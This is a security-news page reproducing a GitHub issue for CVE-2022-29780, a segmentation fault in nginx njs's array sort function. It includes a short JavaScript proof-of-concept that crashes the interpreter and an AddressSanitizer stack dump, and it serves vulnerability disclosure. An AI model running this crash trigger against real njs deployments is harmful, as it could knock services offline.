Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-29780: SEGV in njs_array_prototype_sort · Issue #486 · nginx/njs

Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_prototype_sort at src/njs_array.c.

CVE
#linux#js#git#nginx

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

xmzyshypnc opened this issue

Mar 21, 2022

· 1 comment

Assignees

Comments

Environment

OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"

PoC

function main() { var empty = {}; var arr1 = [empty,empty]; function func(arg) { arr1[0xffff] *= arg; } var v5 = arr1.sort(func); } main();

Stack dump

AddressSanitizer:DEADLYSIGNAL

==610159==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff6f91b13 bp 0x7fffffffb3d0 sp 0x7fffffffab48 T0) ==610159==The signal is caused by a WRITE memory access. ==610159==Hint: address points to the zero page. #0 0x7ffff6f91b12 in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) #1 0x7ffff7688d40 in __asan_memcpy …/…/…/…/src/libsanitizer/asan/asan_interceptors_memintrinsics.cc:21 #2 0x5555556042ff in njs_array_prototype_sort src/njs_array.c:2704 #3 0x55555561961c in njs_function_native_call src/njs_function.c:739 #4 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #5 0x555555618aba in njs_function_lambda_call src/njs_function.c:703 #6 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #7 0x5555555b90ba in njs_vm_start src/njs_vm.c:553 #8 0x5555555a23f8 in njs_process_script src/njs_shell.c:890 #9 0x5555555a2ebf in njs_process_file src/njs_shell.c:619 #10 0x5555555a421f in main src/njs_shell.c:303 #11 0x7ffff6efa0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #12 0x55555559fc4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)

AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) in memcpy ==610159==ABORTING

Credit

xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)

Copy link

Contributor

** xeioex commented Apr 23, 2022**

2 participants

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907